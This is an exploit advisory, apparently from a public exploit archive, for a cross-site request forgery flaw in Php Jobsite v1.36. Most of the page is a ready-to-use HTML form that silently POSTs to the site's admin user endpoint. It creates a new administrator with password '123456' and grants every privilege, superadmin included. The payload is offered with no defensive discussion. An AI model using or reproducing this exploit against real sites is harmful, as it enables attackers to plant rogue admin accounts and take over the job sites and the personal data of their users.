facebook facebook twitter rss

Php Jobsite v1.36 CSRF Vulnerability (Add Admin)

Author: AtT4CKxT3rR0r1ST , Published: 07-06-2012
Php Jobsite v1.36  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.scriptdemo.com/
.:. Tested On Demo : http://www.scriptdemo.com/php-jobsite/demo/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/admin/admin_user.php">
<input type="hidden" name="todo" value="add_user"/>
<input type="hidden" name="au_name" value="Admin"/>
<input type="hidden" name="au_pwd" value="123456"/>
<input type="hidden" name="confau_pwd" value="123456"/>
<input type="hidden" name="access[]" value="superadmin"/>
<input type="hidden" name="access[]" value="bulk_admin"/>
<input type="hidden" name="access[]" value="db_admin"/>
<input type="hidden" name="access[]" value="user_admin"/>
<input type="hidden" name="access[]" value="fee_admin"/>
<input type="hidden" name="access[]" value="cross_admin"/>
<input type="hidden" name="access[]" value="engine_admin"/>
<input type="hidden" name="access[]" value="comp_admin"/>
<input type="hidden" name="access[]" value="acomp_admin"/>
<input type="hidden" name="access[]" value="job_admin"/>
<input type="hidden" name="access[]" value="ajob_admin"/>
<input type="hidden" name="access[]" value="pers_admin"/>
<input type="hidden" name="access[]" value="apers_admin"/>
<input type="hidden" name="access[]" value="res_admin"/>
<input type="hidden" name="access[]" value="ares_admin"/>
<input type="hidden" name="access[]" value="setting_admin"/>
<input type="hidden" name="access[]" value="lng_admin"/>
<input type="hidden" name="access[]" value="upgrade_admin"/>
<input type="hidden" name="access[]" value="search_comp"/>
<input type="hidden" name="access[]" value="search_job"/>
<input type="hidden" name="access[]" value="search_jobapply"/>
<input type="hidden" name="access[]" value="search_pers"/>
<input type="hidden" name="access[]" value="search_compprivate"/>
<input type="hidden" name="access[]" value="search_persprivate"/>
<input type="hidden" name="access[]" value="search_res"/>
<input type="hidden" name="access[]" value="invoice_admin"/>
<input type="hidden" name="access[]" value="stat_admin"/>
<input type="hidden" name="access[]" value="log_admin"/>
<input type="hidden" name="access[]" value="cron_admin"/>
<input type="hidden" name="access[]" value="skin_admin"/>
<input type="hidden" name="access[]" value="news_admin"/>
<input type="hidden" name="access[]" value="article_admin"/>
<input type="hidden" name="access[]" value="testimonial_admin"/>
<input type="hidden" name="save" value="Add Admin User"/>
</form>

</body>
</html>


####################################################################

Like us on Facebook :